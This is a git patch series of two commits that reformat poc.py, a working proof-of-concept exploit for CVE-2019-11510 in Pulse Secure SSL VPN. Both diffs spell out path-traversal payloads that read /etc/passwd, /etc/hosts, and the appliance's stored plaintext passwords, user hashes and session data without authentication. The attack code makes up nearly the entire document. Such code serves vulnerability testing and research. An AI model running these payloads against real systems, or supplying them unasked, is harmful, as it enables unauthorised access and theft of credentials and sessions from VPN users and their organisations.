From 34b0d40572db85acfec5b7345672875168eb3755 Mon Sep 17 00:00:00 2001 From: Keith Myers Date: Mon, 26 Aug 2019 10:49:01 -0400 Subject: [PATCH 1/2] Update poc.py Fixed formatting on line 79 --- poc.py | 134 ++++++++++++++++++++++++++++++++++----------------------- 1 file changed, 79 insertions(+), 55 deletions(-) diff --git a/poc.py b/poc.py index 0daace6..b88ed29 100644 --- a/poc.py +++ b/poc.py @@ -1,5 +1,6 @@ -#!/usr/bin/env python +#!/usr/bin/python # -*- coding: utf-8 -*- + # @Time : 2019/8/22 14:15 # @Author : 兀 # @File : CVE-2019-11510.py @@ -23,11 +24,11 @@ class TestPOC(POCBase): vulDate = '2019-08-10' createDate = '2019-08-14' updateDate = '2019-08-14' - references = [ - "https://hackerone.com/reports/591295", - "https://github.com/projectzeroindia/CVE-2019-11510/blob/master/CVE-2019-11510.sh", - "https://packetstormsecurity.com/files/154176/Pulse-Secure-SSL-VPN-8.1R15.1-8.2-8.3-9.0-Arbitrary-File-Disclosure.html" - ] + references = ['https://hackerone.com/reports/591295', + 'https://github.com/projectzeroindia/CVE-2019-11510/blob/master/CVE-2019-11510.sh' + , + 'https://packetstormsecurity.com/files/154176/Pulse-Secure-SSL-VPN-8.1R15.1-8.2-8.3-9.0-Arbitrary-File-Disclosure.html' + ] name = 'Pulse Secure SSL VPN Pre-auth' appPowerLink = 'https://www.pulsesecure.net/' appName = 'Pulse Secure SSL VPN ' @@ -37,9 +38,8 @@ class TestPOC(POCBase): vulType = '' desc = ''' ''' - samples = [ - ] - install_requires = "" + samples = [] + install_requires = '' def _attack(self): return self._verify() @@ -51,74 +51,98 @@ def _verify(self): port = urlparse.urlparse(self.url).port scheme = urlparse.urlparse(self.url).scheme if port is None: - port = "80" + port = '80' else: port = str(port) - if "https" == scheme: - self.url = "%s://%s" % (scheme, host) + if 'https' == scheme: + self.url = '%s://%s' % (scheme, host) else: - self.url = "%s://%s:%s" % (scheme, host, port) - paylaod = "/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/" - headers = {"User-Agent": "Mozilla/5.0", - "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", - "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", - "Upgrade-Insecure-Requests": "1"} + self.url = '%s://%s:%s' % (scheme, host, port) + paylaod = \ + '/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/' + headers = { + 'User-Agent': 'Mozilla/5.0', + 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', + 'Accept-Language': 'en-US,en;q=0.5', + 'Accept-Encoding': 'gzip, deflate', + 'Connection': 'close', + 'Upgrade-Insecure-Requests': '1', + } try: - res = req.get(self.url + paylaod, verify=False, headers=headers, timeout=(10, 15)) - if "root:x:0:0:root" in res.text and res.status_code == 200: - result["VerifyInfo"] = {} - result["VerifyInfo"]["URL"] = self.url - result["VerifyInfo"]["passwd"] = res.text - result["VerifyInfo"]["host"] = self.get_hosts() - except Exception as e: + res = req.get(self.url + paylaod, verify=False, + headers=headers, timeout=(10, 15)) + if 'root:x:0:0:root' in res.text and res.status_code == 200: + result['VerifyInfo'] = {} + result['VerifyInfo']['URL'] = self.url + result['VerifyInfo']['passwd'] = res.text + result['VerifyInfo']['host'] = self.get_hosts() + except Exception, e: pass return self.parse_output(result) def get_hosts(self): - payload = "/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/hosts?/dana/html5acc/guacamole/" - headers = {"User-Agent": "Mozilla/5.0", - "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", - "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", - "Upgrade-Insecure-Requests": "1"} + payload = \ + '/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/hosts?/dana/html5acc/guacamole/' + headers = { + 'User-Agent': 'Mozilla/5.0', + 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', + 'Accept-Language': 'en-US,en;q=0.5', + 'Accept-Encoding': 'gzip, deflate', + 'Connection': 'close', + 'Upgrade-Insecure-Requests': '1', + } try: - res = req.get(self.url + payload, verify=False, headers=headers, timeout=(10, 15)) + res = req.get(self.url + payload, verify=False, + headers=headers, timeout=(10, 15)) return res.text - except Exception as e: + except Exception, e: return None def get_user_password(self): - payload_palntext_passwd = "/dana-na/../dana/html5acc/guacamole/../../../../../../../data/runtime/mtmp/lmdb/dataa/data.mdb?" \ - "/dana/html5acc/guacamole/" - payload_user_hash = "/dana-na/../dana/html5acc/guacamole/../../../../../../../data/runtime/mtmp/system?" \ - "/dana/html5acc/guacamole/" + payload_palntext_passwd = \ + '/dana-na/../dana/html5acc/guacamole/../../../../../../../data/runtime/mtmp/lmdb/dataa/data.mdb?/dana/html5acc/guacamole/' + payload_user_hash = \ + '/dana-na/../dana/html5acc/guacamole/../../../../../../../data/runtime/mtmp/system?/dana/html5acc/guacamole/' - headers = {"User-Agent": "Mozilla/5.0", - "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", - "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", - "Upgrade-Insecure-Requests": "1"} + headers = { + 'User-Agent': 'Mozilla/5.0', + 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', + 'Accept-Language': 'en-US,en;q=0.5', + 'Accept-Encoding': 'gzip, deflate', + 'Connection': 'close', + 'Upgrade-Insecure-Requests': '1', + } try: - plantextpasswd = req.get(self.url + payload_palntext_passwd, verify=False, headers=headers, - timeout=(10, 15)).text - except Exception as e: + plantextpasswd = req.get(self.url + + payload_palntext_passwd, verify=False, + headers=headers, timeout=(10, 15)).text + except Exception, e: plantextpasswd = '' try: - userhash = req.get(self.url + payload_user_hash, verify=False, headers=headers, timeout=(10, 15)).text - except Exception as e: + userhash = req.get(self.url + payload_user_hash, + verify=False, headers=headers, + timeout=(10, 15)).text + except Exception, e: userhash = '' - return plantextpasswd, userhash + return (plantextpasswd, userhash) def get_session(self): - payload = "/dana-na/../dana/html5acc/guacamole/../../../../../../../data/runtime/mtmp/lmdb/randomVal/" \ - "data.mdb?/dana/html5acc/guacamole/" - headers = {"User-Agent": "Mozilla/5.0", - "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", - "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", - "Upgrade-Insecure-Requests": "1"} + payload = \ + '/dana-na/../dana/html5acc/guacamole/../../../../../../../data/runtime/mtmp/lmdb/randomVal/data.mdb?/dana/html5acc/guacamole/' + headers = { + 'User-Agent': 'Mozilla/5.0', + 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', + 'Accept-Language': 'en-US,en;q=0.5', + 'Accept-Encoding': 'gzip, deflate', + 'Connection': 'close', + 'Upgrade-Insecure-Requests': '1', + } try: - res = req.get(self.url + payload, verify=False, headers=headers, timeout=(10, 15)) + res = req.get(self.url + payload, verify=False, + headers=headers, timeout=(10, 15)) return res.text - except Exception as e: - return "" + except Exception, e: + return '' def parse_output(self, result): output = Output(self) From 2abbd862640130c3e46598e8dbc180ffae357d5f Mon Sep 17 00:00:00 2001 From: Keith Myers Date: Mon, 26 Aug 2019 10:52:33 -0400 Subject: [PATCH 2/2] Update poc.py Fixed more formatting errors --- poc.py | 134 +++++++++++++++++++++++---------------------------------- 1 file changed, 55 insertions(+), 79 deletions(-) diff --git a/poc.py b/poc.py index b88ed29..a9bee46 100644 --- a/poc.py +++ b/poc.py @@ -1,6 +1,5 @@ -#!/usr/bin/python +#!/usr/bin/env python # -*- coding: utf-8 -*- - # @Time : 2019/8/22 14:15 # @Author : 兀 # @File : CVE-2019-11510.py @@ -24,11 +23,11 @@ class TestPOC(POCBase): vulDate = '2019-08-10' createDate = '2019-08-14' updateDate = '2019-08-14' - references = ['https://hackerone.com/reports/591295', - 'https://github.com/projectzeroindia/CVE-2019-11510/blob/master/CVE-2019-11510.sh' - , - 'https://packetstormsecurity.com/files/154176/Pulse-Secure-SSL-VPN-8.1R15.1-8.2-8.3-9.0-Arbitrary-File-Disclosure.html' - ] + references = [ + "https://hackerone.com/reports/591295", + "https://github.com/projectzeroindia/CVE-2019-11510/blob/master/CVE-2019-11510.sh", + "https://packetstormsecurity.com/files/154176/Pulse-Secure-SSL-VPN-8.1R15.1-8.2-8.3-9.0-Arbitrary-File-Disclosure.html" + ] name = 'Pulse Secure SSL VPN Pre-auth' appPowerLink = 'https://www.pulsesecure.net/' appName = 'Pulse Secure SSL VPN ' @@ -38,8 +37,9 @@ class TestPOC(POCBase): vulType = '' desc = ''' ''' - samples = [] - install_requires = '' + samples = [ + ] + install_requires = "" def _attack(self): return self._verify() @@ -51,98 +51,74 @@ def _verify(self): port = urlparse.urlparse(self.url).port scheme = urlparse.urlparse(self.url).scheme if port is None: - port = '80' + port = "80" else: port = str(port) - if 'https' == scheme: - self.url = '%s://%s' % (scheme, host) + if "https" == scheme: + self.url = "%s://%s" % (scheme, host) else: - self.url = '%s://%s:%s' % (scheme, host, port) - paylaod = \ - '/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/' - headers = { - 'User-Agent': 'Mozilla/5.0', - 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', - 'Accept-Language': 'en-US,en;q=0.5', - 'Accept-Encoding': 'gzip, deflate', - 'Connection': 'close', - 'Upgrade-Insecure-Requests': '1', - } + self.url = "%s://%s:%s" % (scheme, host, port) + paylaod = "/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/" + headers = {"User-Agent": "Mozilla/5.0", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", + "Upgrade-Insecure-Requests": "1"} try: - res = req.get(self.url + paylaod, verify=False, - headers=headers, timeout=(10, 15)) - if 'root:x:0:0:root' in res.text and res.status_code == 200: - result['VerifyInfo'] = {} - result['VerifyInfo']['URL'] = self.url - result['VerifyInfo']['passwd'] = res.text - result['VerifyInfo']['host'] = self.get_hosts() - except Exception, e: + res = req.get(self.url + paylaod, verify=False, headers=headers, timeout=(10, 15)) + if "root:x:0:0:root" in res.text and res.status_code == 200: + result["VerifyInfo"] = {} + result["VerifyInfo"]["URL"] = self.url + result["VerifyInfo"]["passwd"] = res.text + result["VerifyInfo"]["host"] = self.get_hosts() + except Exception as e: pass return self.parse_output(result) def get_hosts(self): - payload = \ - '/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/hosts?/dana/html5acc/guacamole/' - headers = { - 'User-Agent': 'Mozilla/5.0', - 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', - 'Accept-Language': 'en-US,en;q=0.5', - 'Accept-Encoding': 'gzip, deflate', - 'Connection': 'close', - 'Upgrade-Insecure-Requests': '1', - } + payload = "/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/hosts?/dana/html5acc/guacamole/" + headers = {"User-Agent": "Mozilla/5.0", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", + "Upgrade-Insecure-Requests": "1"} try: - res = req.get(self.url + payload, verify=False, - headers=headers, timeout=(10, 15)) + res = req.get(self.url + payload, verify=False, headers=headers, timeout=(10, 15)) return res.text - except Exception, e: + except Exception as e: return None def get_user_password(self): - payload_palntext_passwd = \ - '/dana-na/../dana/html5acc/guacamole/../../../../../../../data/runtime/mtmp/lmdb/dataa/data.mdb?/dana/html5acc/guacamole/' - payload_user_hash = \ - '/dana-na/../dana/html5acc/guacamole/../../../../../../../data/runtime/mtmp/system?/dana/html5acc/guacamole/' + payload_palntext_passwd = "/dana-na/../dana/html5acc/guacamole/../../../../../../../data/runtime/mtmp/lmdb/dataa/data.mdb?" \ + "/dana/html5acc/guacamole/" + payload_user_hash = "/dana-na/../dana/html5acc/guacamole/../../../../../../../data/runtime/mtmp/system?" \ + "/dana/html5acc/guacamole/" - headers = { - 'User-Agent': 'Mozilla/5.0', - 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', - 'Accept-Language': 'en-US,en;q=0.5', - 'Accept-Encoding': 'gzip, deflate', - 'Connection': 'close', - 'Upgrade-Insecure-Requests': '1', - } + headers = {"User-Agent": "Mozilla/5.0", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", + "Upgrade-Insecure-Requests": "1"} try: - plantextpasswd = req.get(self.url - + payload_palntext_passwd, verify=False, - headers=headers, timeout=(10, 15)).text - except Exception, e: + plantextpasswd = req.get(self.url + payload_palntext_passwd, verify=False, headers=headers, + timeout=(10, 15)).text + except Exception as e: plantextpasswd = '' try: - userhash = req.get(self.url + payload_user_hash, - verify=False, headers=headers, - timeout=(10, 15)).text - except Exception, e: + userhash = req.get(self.url + payload_user_hash, verify=False, headers=headers, timeout=(10, 15)).text + except Exception as e: userhash = '' - return (plantextpasswd, userhash) + return plantextpasswd, userhash def get_session(self): - payload = \ - '/dana-na/../dana/html5acc/guacamole/../../../../../../../data/runtime/mtmp/lmdb/randomVal/data.mdb?/dana/html5acc/guacamole/' - headers = { - 'User-Agent': 'Mozilla/5.0', - 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', - 'Accept-Language': 'en-US,en;q=0.5', - 'Accept-Encoding': 'gzip, deflate', - 'Connection': 'close', - 'Upgrade-Insecure-Requests': '1', - } + payload = "/dana-na/../dana/html5acc/guacamole/../../../../../../../data/runtime/mtmp/lmdb/randomVal/" \ + "data.mdb?/dana/html5acc/guacamole/" + headers = {"User-Agent": "Mozilla/5.0", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", + "Upgrade-Insecure-Requests": "1"} try: - res = req.get(self.url + payload, verify=False, - headers=headers, timeout=(10, 15)) + res = req.get(self.url + payload, verify=False, headers=headers, timeout=(10, 15)) return res.text - except Exception, e: - return '' + except Exception as e: + return "" def parse_output(self, result): output = Output(self)